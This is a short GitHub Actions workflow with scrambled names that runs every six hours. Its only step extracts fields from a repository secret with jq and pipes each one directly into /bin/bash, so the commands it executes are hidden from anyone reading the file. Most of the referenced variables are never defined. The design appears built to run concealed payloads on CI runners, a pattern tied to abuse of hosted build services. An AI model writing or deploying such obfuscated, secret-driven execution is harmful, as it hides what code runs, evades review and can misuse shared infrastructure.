name: mingzizxv
on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mingzizxv
        env:
          norod8: ${{ secrets.norod8 }}
        run: |
          echo $norod8 | jq -r .yytj58 | /bin/bash
          echo $avb008 | jq -r .lpno22 | /bin/bash
          echo $vvmsw8 | jq -r .c00365 | /bin/bash
          echo $fjefj955 | jq -r .a758 | /bin/bash
          echo $dvtwy1521 | jq -r .fdk72 | /bin/bash
          echo $vh56714 | jq -r .vyv9 | /bin/bash
          echo $lmmgi083 | jq -r .uzqzx1 | /bin/bash
          echo $euhlc52433 | jq -r .kd338 | /bin/bash
          echo $dee82 | jq -r .of19 | /bin/bash
          echo $ncq0656 | jq -r .hfykj622 | /bin/bash
          echo $f2917 | jq -r .rgj3434 | /bin/bash
          echo $kk1 | jq -r .ld9150 | /bin/bash
          echo $ofry9459 | jq -r .wolxm608 | /bin/bash

